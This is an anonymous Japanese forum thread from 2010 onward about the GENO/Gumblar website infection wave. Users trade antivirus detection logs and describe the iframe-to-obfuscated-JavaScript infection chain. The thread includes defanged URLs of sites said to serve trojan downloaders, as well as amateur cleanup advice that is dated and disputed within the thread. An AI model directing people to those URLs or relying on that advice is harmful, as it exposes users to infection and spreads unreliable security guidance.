日本人ではなさそうな予感
606 :
603 :2010/01/08(金) 17:35:23
これ、つかまえたらすごいね。 ハッカー逮捕!とか、でっかく出るのかな。 病原菌?
MSみたいに懸賞金かければいいのに
>>605 複数居てもおかしくないと思う
犯人日本人でなきゃ見つけるのも難しいよな
犯人は日本人じゃねーだろw 中露のどっちかだろうなw
これ、犯人が外国人だったらどーなんの? どーしょーもない?
今回、仕組み調べるためにあちこちにアクセスしちゃったから、 何かの間違いで調べとか入ったらやばいな。 ウイルスに関しては調べられても何も出てこないが(やってないんだから)、 HDDの中のエロ動画が違法じゃなくても恥ずかしすぎるw
感染サイトを意図的にはった人とかも逮捕されたりして
特定なんて無理じゃないか? アクセス解析してうんたらかんたらで出来るもんなのか?
>>616 ウイルス本体が置かれている鯖→ロシア
協力してもらえない予感ww
>>616 時系列に追っていけば最初の発生源が分かる
はず
少なくとも日本国内管理下の鯖の感染第一号は特定できるかも
>>605 そもそも日本企業狙い撃ちする旨味がないし、
テストでなければ日本(在住)人の可能性が高いのでは?
620 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 18:45:06
おまえやれ。
感染拡大する以前の導入段階は単純な不正アクセスなんだから特定できるだろうに というか、だからこそk察が動くって話になってるんだろ
つうかこれまで動いてなかったんかと ウイルス製作者って中々捕まらんのだな アンチウイルスソフト作ってるところが流してるという噂もこういう所から出てきてるんだろうな
genoや8080って 海外の企業も被害出てるの? 日本企業ばかりのイメージがあるんだけど
去年の5月くらいからずっと被害でてるよ
>>623 今回みたいに被害が大きくならないと動けないんじゃね?
動いても犯人捕まえられそうにない予感
日本人じゃないしな
>>624 日本語のニュースが出てないだけじゃね
企業かどうかとか国がどこかとか区別されていない
628 :
名無しさん@お腹いっぱい。 :2010/01/08(金) 22:47:09
日本の警察が捕まえられるのはP2P利用者のような 権力があれば誰でも捕まえられるレベルだけ。
日本の警察に何ができるの? 部下「課長、ノートン警察ってのがありますよ」 課長「よし!そこへ協力を頼もう」 とかじゃないよね
まぁ、無理だな 調べたところで、botと串が出てきて終わりだろ 民主党が不正アクセスに加担していた なんて事になればもっと無理
>>632 地道にっつってもその辺は自動化されてると思うよ。
>>570 sysgif32が登録されないパターンもあるっぽいから油断禁物
>>557 あるとまずいもの
>C:\Documents and Settings\ユーザー名\スタート メニュー\プログラム\siszyd32.exe
プログラムフォルダに見当たらなかったので、
テキストファイルをつくって、名前変更してsiszyd32.exeにしたら、削除できなくなって困ったw
なにその面白プレイ
削除できないと困るのか?
>>635 マジか
他に確認方法ある?ちなみにavast使ってます
ってか、確実に確認できる方法が確立してれば ここまでの騒ぎにはならないわけで。 判明してる方法でわからないのであれば あとは自分が出来る限りの回避策をとって運任せ。 それか当分ネットから離れるかのどっちかだw
>>638 「他のプログラムが使用していて削除できません」
とかウイルスがいるような気がするだろw
これ、三糞とか2NNとかコソアンとかが感染してたら さらにどえらい騒ぎになるんだろうなあ。
>>574 WindowsPEを使えば見えないファイルも見えるはず。
p://mangakakouze●com/ 新型きますた
新型か〜
>>647 カスペルスキーさんは検知してくれました
Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません
URL:
p://mangakakouze●com/
このWebページはウイルスに感染しています
次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewo
情報:
21:17:03
Kaspersky Internet Security 2010
>>650 MSE使用者の馬鹿さ加減がよく分かるなw
またうちの子は検出してくれる!!スゴイ合戦してるのか
重要なことだろ スクリプトだけで判断するやつが多いのは問題だが それもどうでも良いわけではない
元を防げよ防いでるならどうでもいい
防ぐのは重要だが感染していることに気づくのも必要なんだよ 気づかないからそのままな人もいる
当たり前のことだがな 馬鹿もいるから仕方ない
Windows使いでなくてよかったよ
やはり有料版かね。
p://www●mag-x●com/ 最新型きますた
>>664 実験用VMでアクセスしたら
avastさんが叩いてくれました
カスペも反応した まぁ、新型だとしてもセキュリティソフトで対処できる程度の応用なわけだ
怖いのはメジャーなサイトでも安心できないという事 これに尽きる 例えば、noscriptやそれに近い方法でJSを止めてる場合は確かに安全だが JSを許可しているサイトが後々、感染する可能性があるからな
JRとかローソンとか普通は見てしまうからなw
yahooが感染したとしてyahoo.co.jpを許可してたら感染しちゃうのか? 誘導するスクリプトを許可してなければ大丈夫だと理解してるけどどうなの?
カスペはLGPLより前の古いスクリプトは検出しないけどな
はいはい
馬鹿信者登場か
>>670 わからんが、yahooは占いページか何かが感染してたぞ
>>670 は私も知りたい。
その場合、yahooから感染サイトへリダイレクトされちゃうけど、
リダイレクト先は許可してないから、攻撃はできないって理解で桶?
>>674 それ意味が違うと思う。
ただyahooの占いサイトの場合、過去ログをたどった先の占いスクリプトか
何かが感染されてたみたいなので、これ、感染スクリプトをもらったままで
アップしちゃっただけなのか、当該サイト管理人のPCが汚染されてたのか、
どっちかはっきりして欲しいと思ったよ。
BBセキュリティが感染してたらおもろかったのに
esetはGNU GPLの頃から検知しないな
esetはしてるだろ 嘘は言うなよ
気にくわないからって嘘はやめてくれ 文句言うならカスペに言えよ
/* BSD なんだこれ
url プリーズ
馬鹿信者登場か
yahooが被害にあったのは何日の何時頃? とりあえずyahooのトップページとメールのページはやられてない?
>>684 >とりあえずyahooのトップページとメールのページはやられてない?
無問題
最近毎日完全スキャン
完全スキャンとかダルくね? 脆弱性を塞いじゃえばいいのに。
js使わないと見られないような企業サイトウザい
一番の問題はそこの気がする。 javascript無いと見れない・機能しないサイト多すぎ flash無いと見れない・機能しないサイト多すぎ そして、javascriptとflashに頼る限り、閲覧側は脆弱性から逃れられない
なんか大手のサイトしか回ってないのに感染した yahooかmsnって他にも感染してる?
何だか、ちょっとしたパニックだな。 いや、完全にパニックか。 いよいよ、世界的にJavaスクリプトとFlashを捨てる時が来たか!! そん時は、新しい亜種が別経路で入り込んで来るんだろうけどなー。
これって世界中でこんな感じなの?それとも日本だけ?
ぐぐればわかる
696 :
名無しさん@お腹いっぱい。 :2010/01/11(月) 21:25:19
>>696 最終的にはiframeで危険なpdfやjavaを含むページを開く
>>697 >ユーザが不正にiframeを埋め込まれたWebサイトを閲覧することから始まります
どこのことよ
>次にIframeにより難読化されたJavaScriptが実行され
んなもんあったけ
あるよ。1段目から落ちてくる
>>702 >>699 はさ、日本語的には
始めに見たHPにiframeがあって
iframeがJavaScriptを実行するという事でしょ
>>703 そこまで追求しなくてもおkだろww
「一部語弊がありました」で済む話
おー、下しか読んでなかったw
メールで送るくらいならWebImmuneにアップしたほうが対応早いぞ
なんでN速厨って本スレではとっくに出尽くした話を わざわざN速にリンク貼ってするんだろうな
厨だからさ
自分たちの情報が最新だって思い込んでるんだね
狙い撃ちwwワロタ
>>708 WebImmuneは登録する必要があるので
私のセキュリティポリシーに反するのだー
最近、騒ぎの中心が8080なせいでGENOが紛れ気味なんだが 活動再会したGENOは以前との違いとかあるのか? タグの挿入場所は変わらず<BODY>の直前?
次スレからスレタイにGumblarを入れるかしたほうがいいかもね
>>393 > GENO(Gumblar)ウイルススレ ★24
当初みてたけどまだやってるんすかwww 今GENOのぺーじでカートに入れてみたけどなんともない genoチェッカでも反応無しみたい。GENOのサイトではもう駆除されたの?
genoチェッカーとか懐かしいなw ページ作った人はどうしてるんだろう
まだいるんじゃねーの? PLなんとかってIDでいたぞ
725 :
名無しさん@お腹いっぱい。 :2010/01/13(水) 13:48:39
tp://genochk.crz.jp/
>>696 =
>>699 釣り?それとも今北産業の人?
昨年春に現れたその時から感染経路はiframeだったしJavaScriptだったし
難読化が出てきたのは昨年夏。
過去ログリスト書いてあるんだから読んでこい。
難読化は最初からされてなかったっけ?
avastには引っかからない?
さっきあるサイト開いたらavastでJS:Illredir-C検出されたんだけどJSオフなら見ても大丈夫かな。 できたら管理者に伝えてやりたいとこなんだけど 見つけてどういうもんか調べてる最中だから下手に踏めない。
>>734 /i と .jsファイルが*GNU GPL*
>>734 とりあえずkagoya.netとJPCERT/CCに報告した。
起動からしかjs切れない黒目終わってるなw
739 :
名無しさん@お腹いっぱい。 :2010/01/14(木) 16:10:55
>>739 その結果ってマカフィーもカスペもスも糞じゃねーかよ
志村ーファイル受理した日付ー日付ー
744 :
名無しさん@お腹いっぱい。 :2010/01/14(木) 18:17:13
>>743 株式会社ロマンシング(笑 ですね、わかります
エロゲーやってる末期池沼にPCなんざイラネ―わなw
ダウソ板に帰れよ
エロゲに仕込む発想は日本人臭い
そもそもShareって時点でお察し
>>748 ZERO って2009の秋すぎから急速に性能上げたな
どこの調査でも検出率を含めた総合評価はかなり良い
毎年さんざん酷評していた某PC誌もこの現象には驚いてたな
新アンチスキャナの性能が相当良いのかな?
執拗にWindows7対応版にアップグレードして下さい! のダイアログ出してくるのはうざいけどな メール送れば対応してくれるらしいが
>急速に性能上げたな 当社比()笑
紙と現実のギャップ()笑
bタグ付きワラタ これでアンチウイルス系は再定義かねぇ
プニルでjsなんかを全部切っておけよ
また火狐野郎がなんかいっちゃってたのか MACつかえ
数値→文字列の変換するだけでメモリリーク起こすMACなんか・・・・ Linux最強!
火狐野郎も相手にされないという
ゲームのブラウザ最強ですね
IEパッチ出たと思ったら gumblarも新型になったみたいですよ 自称マジョリティの方は対策頑張ってくださいな
メジャーの方が楽だよ。 あらゆることでトラブルに巻き込まれる奴が必ず居るから 簡単に情報が入る。
挿入されるコードが変わっただけだろ。 導かれる処理とか突かれる脆弱性、回避策が全く変わっていないのに新型とかいうなよ。
だな foxitの情報がほとんど出てこない
769 :
名無しさん@お腹いっぱい。 :2010/01/23(土) 00:05:34
だねえ。メジャーなものは要望やウイルスが多くなるから不具合も多いが、 その分、暇な人が解決策を強引にでも作るからそれにのるだけでいい。 マイナーなものだと解決策がないどころか、気付かないことのほうが多い。
770 :
名無しさん@お腹いっぱい。 :2010/01/23(土) 00:12:29
foxitユーザーに朗報です 未だに修正されていないアレゲな脆弱性有り・・・
そういや3.6はどうなんだろ。まだ様子見してるが
入れたけど3.5とそれほど変わらん。拡張とかはお察し。 あとプラグインチェックは何の役にも立たないクソ機能。
俺も真っ赤になって質問するぞ・・・・とりあえず、詳しいやつ助けてくれ・・・・ どうなったらアウト何だよおおおおおおおおおおおおおおおおおおおおおお もう情報漏れてんのか、再起動したらもうご愁傷様なのか、おれの
>>774 vip板の風俗嬢がなんからかんたらって沢山wが付いたスレの誤爆でしょ
JS DLOADR.VTGっていうウイルスに感染したっぽいんだけど GENOの亜種かな? ウイルスバスターでは対処できないみたいなんだけど・・・
じゃぁノートンとかで。
781 :
名無しさん@お腹いっぱい。 :2010/01/25(月) 20:13:24
今カスペのオンラインスキャンがメンテ中だからniftyのカスペスキャンやろうとしてたんだけど 1回目のアドオンの許可では承認(認証だったかな?)されたkaspersky labのアドオンだったけど 2回目に承認されてないkaspersky online scanner pro gui partってのが出てきた。実行したけど・・・ ググッたらkaspersky online scanner proがトロイとして検出されたっていってる人もいたけど俺のPCもうやられたのかなwwww
ググって出てきた記事 2007/10/12って出てるから 大丈夫だろ ニフティがウイルスに感染してるという話も聞かないしな
さっきaviraが「C\WINDOWS\lfd4_tmp.#32」がトロイだと騒いでた 検索してみるとGENOウイルスの亜種ってことなんだが、実際はどうなんでしょうか?
とっとと削除しろよ
admachikoって何よ
ともだちんこ
788 :
ノートン太郎くん :2010/01/29(金) 22:56:13
見たことあると思ったらTERUMIか
?
懐かしいなw
てst
?
【産経抄】3月3日 2010.3.3 02:44 ネットの巨大掲示板「2ちゃんねる」のサーバーがダウンし、日韓のネットユーザーたちを熱くさせている。 韓国から大規模なサイバー攻撃を受けたためらしく、きのう午後もアクセスしようとしたがだめだった。 ▼原因は、バンクーバー五輪で金メダルを獲得した金妍児選手を批判する意見が、掲示板上に多数寄せられたためだとか。 小欄も2ちゃんねるの掲示板には、しょっちゅう悪口を書かれているので、助っ人する義理はないのだが、由々しき事態である。 ▼ネットの匿名掲示板は、好き勝手な意見を書けるのが売りだが、受け狙いのあまり過激に走りやすい。 それを真に受けて、サイバー攻撃を仕掛けるとは韓国のネットユーザーも大人げない。 ▼大人げないどころか謀略のにおいさえする。サイバー攻撃が始まった1日は、日本統治時代に独立を求めて起きた「3・1独立運動」記念日。 毎年、大統領が演説することになっているが、李明博大統領は就任以来、未来志向の日韓関係を訴え続けている。日韓併合100年の今年も「過去にとらわれない」と強調した。 ▼2ちゃんねる風に書けば、「3・1」に対日批判を繰り返していた盧武鉉前大統領の支持者は、これが気にくわない。 今回の事件は、ささいな理由で韓国のネットユーザーをあおり、日本の「嫌韓」派に火をつけることによって両国の離反を狙ったテロ行為そのものだ。 ▼2ちゃんねるは政治も大好きだ。民主党の小沢一郎幹事長の一挙手一投足をあげつらったコメントは天文学的数字にのぼる。 いつもなら民主党議員側に違法献金したとして北海道教職員組合幹部が逮捕された事件も格好のネタになっていたはずだ。実は民主党もサーバーダウンを喜んでいたりして。
>>797 産経もいよいよ落ちるところまで落ちた感があるな
GENOウイルスのせいです
, ‐ 、 - ― 、_ .-―、.、 _ /: /: : :/ /: : :\: : :ヽ ヽ r‐、 __| |__ . / : /:_:_:ィ :.|/: :i : : : .ヽ: :ヽ : i | | |__ __| / ̄ ̄ ̄\ |: : /:/\i :/|: : ii : :.i : : :| : |.: | | | | | ____ | r-‐-、 | |: :|/fイi.}:/ .!: /ヽ i : : /|イvリ | | | | |____| `‐‐' ,.-‐'′/ |:/ ゞ-' fイハ/i |:// | ! { / ̄ ̄ `ヽ、 |_r‐'′ |∧ ,、_ ヾつ'oi//: ノ | ! | (二} iヽノ r-、 |:::ヽ_ ! ノ / : : / !___} `ー‐---'′ └┘ ヽ|::i : r―∠: : /
801 :
名無しさん@お腹いっぱい。 :2010/03/07(日) 10:36:02
>>801 2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト
ttp://irving-maichi ●jp/common/ flash.js アプリケーションを仮想実行中です 高
2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト
ttp://irving-maichi ●jp/common/ right_click_prohibition.js アプリケーションを仮想実行中です 高
2010/03/07 10:46:37 感染しています トロイの木馬 Trojan-Downloader.JS.Pegel.b Webサイト
ttp://irving-maichima ●jp/common/ menu.js アプリケーションを仮想実行中です 高
803 :
◇いつも完璧、それがノートンのセキュリティです。 :2010/03/07(日) 11:21:34
805 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 00:40:45
806 :
名無しさん@お腹いっぱい。 :2010/03/08(月) 00:46:03
>google検索で結構上位にいたぞ。 Google 急上昇ワード
807 :
名無しさん@お腹いっぱい。 :2010/04/05(月) 12:26:08
>>770 foxitはマイナーすぎて攻撃側が対応してないだろ
Adobeのしか攻撃ターゲットになってない
808 :
Searchくん :2010/04/06(火) 16:25:04
日本語でおk
810 :
名無しさん@お腹いっぱい。 :2010/04/12(月) 10:56:23
一応
>>1 の対策は取ってるが
Adobereaderが8だった
アップデートしても8じゃムダなのかな?
オンラインスキャンページも感染してるんじゃねと怖くて
いつも感染確認はプログラムからcmd.exeとregedit.exeの起動な俺
志村ー、日付日付ー! 1 名前:名無しさん@お腹いっぱい。 [] 投稿日:2009/12/01(火) 04:01:23
>>810 情報古すぎて無効なので今更そんな確認しても無駄です
オンラインスキャンのページが感染してたらとっくに騒ぎになってるはずだと思わないか?
そのくせに
>>1 の確認方法を信じるという思考が謎すぎる
おとなしくニフティのスキャンでもやっとけよ
こわいなら素直にOS入れなおせばおk
>>813 それもそうだな、と思ってオンラインスキャン入れようとしたらアップデート失敗した
スキャン前に最新のウイルス定義データベースに〜と言われる
kaspersky online scanner pro gui partが検索してもどういうのかさっぱりだし
情報バーの選択肢が「アドオンの実行」「全てのwebサイトで〜」しか無くて怖くて実行してなかったんだが
これがまずかったのかな
スマン、インし直したら開始できた
推奨スキャンで完了するまで17分ほどスキャンしたが特にウイルスは無し
こんな無知な奴に助言ありがとう
>>813
>>816 ありがとう
java(TM)6は最新版のupdate19に更新してるんだけど、
J2SE Runtimeの方は記憶に無いんだ
かといってruntimeの更新確認しようとすると決まってjava6 update19のダウンロードページにたどり着く、JRE単独の更新ページが見つからない
コントロールパネルだと別々だけどjava(TM)=JREなのかな
>>817 java 0-day 出てるんで、update20が出るまでアンインストール
しとくのが吉かと。
…上ふたつ、あぼんしたが宜しいか?
>>817 何を言っているのかわからん
必要な部分を省略しすぎてる上に自分でも理解できない用語を使ってるのがすごくわかる
JREって意味わかって使ってんの?J2SE RuntimeもJREだろ
とりあえず古いバージョンのJavaランタイムが残ってるならアンインストールでおk
わからなかったらJava関連全部アンインストールすればおk
どうせ使ってないだろうし使ってないソフトはアンインストール推奨
GENOで注文したら変なメールが急にたくさん届いたけどこれヤバイの?
827 :
名無しさん@お腹いっぱい。 :2010/05/06(木) 04:15:32
,, ―- 、_ / '' - ,, / '' - ,, / ヽ i / /ヽ ! ,i ./ / ''―、 ! i ,、 n て'' ノノ ヾ ! i ノノノ ノ ノ ''´ ! / U j ' ´ ノ ( ヽ | >-,, / ,,=━━・!' ,ノ━== ! ノ !・ ヽ | ’ニンniii、 :::::i/ィ7iii= i ) \(てi iヽ ^' ~ -' /} `i_ 、 \ i_ l_j `┐ i /(,,, ,n 〉 /\\ 物売るっていうレベルじゃねぇぞ!  ̄ ̄へ ! ' T'' l | \ | ! i ン=ェェi) i ソ ) | i´\! ,, -ェ`、_ン ノノ 〈 | | \\,, `―''´// | | つ !、_''''''''''''' / 7
829 :
名無しさん@お腹いっぱい。 :2010/05/10(月) 14:40:38
(゚Д゚)ハァ?
キリッ
831 :
名無しさん@お腹いっぱい。 :2010/06/11(金) 02:49:09
アッー
832 :
名無しさん@お腹いっぱい。 :2010/06/24(木) 21:28:47
∧∧ (д´* ) (⊃⌒*⌒⊂) /__ノωヽ__)
834 :
名無しさん@お腹いっぱい。 :2010/07/21(水) 14:11:31
!?
AVGで誤検出が発生してるみたいだね
840 :
名無しさん@お腹いっぱい。 :2010/12/14(火) 19:59:10
もう終わったの?
841 :
名無しさん@お腹いっぱい。 :2010/12/15(水) 21:01:21
今日VISTA 64bitでやられた・・・
843 :
名無しさん@お腹いっぱい。 :2010/12/15(水) 22:32:22
スクリプト切ってなかったの
>>843 ぉっ。
OSのうpだてとフラッシュ・JAVA・PDFやQuicktimeとかとかのうpだてもしなかったの?
845 :
841 :2010/12/15(水) 23:58:53
黒画面でポインタしかうごかね LinuxのCDブーストでHDはいきとるの確認 セキュリティ高くないPCだからしゃーない 解決策探してここに来たから、 うまく説明できない 聞きたいことを逆にkwsk
Windows7だけど、Windowsのユーザー権限を変更したら >黒画面でポインタしかうごかね になって焦ったことがあるよ
847 :
名無しさん@お腹いっぱい。 :2010/12/16(木) 11:42:39
848 :
名無しさん@お腹いっぱい。 :2010/12/16(木) 11:53:49
849 :
名無しさん@お腹いっぱい。 :2010/12/16(木) 13:57:58
そもそもどのタイミングで何故感染したと分かったんだ
Vistaは感染しにくいはずだが
851 :
名無しさん@お腹いっぱい。 :2010/12/16(木) 20:52:26
>黒い画面にマウスカーソル・マウスポインターのみ表示され、 >Windowsが起動しない。セーフモードでも起動することはできません。 この症状ってGENOウイルス亜種じゃないのかお?
ここチェックしてる人いるんだね 安心した
853 :
名無しさん@お腹いっぱい。 :2010/12/21(火) 21:20:18
ゲノン総督
854 :
名無しさん@お腹いっぱい。 :2010/12/22(水) 11:10:40
ドルドレイ攻略
856 :
ななし。 :2011/07/27(水) 23:06:44.21
カ オ ス ラ ウ ン ジ ゆ る せ な ぁ い ー
tes
絶滅
win7だけど定期的に真っ暗になる 再起動何回かすると元に戻るけど
保守
>>860 バックライトが切れかかってるんじゃね?
保守
864 :
名無しさん :2013/10/14(月) 22:46:25.54 ID:???
MSEだと特定のページでメッセージが出るらしい、またやらかしたのか?
>>851 うわあ今の俺だ
コンセント抜いてしばらく置いたらなぜか通常起動したけど、ビビってウイルス検索始めた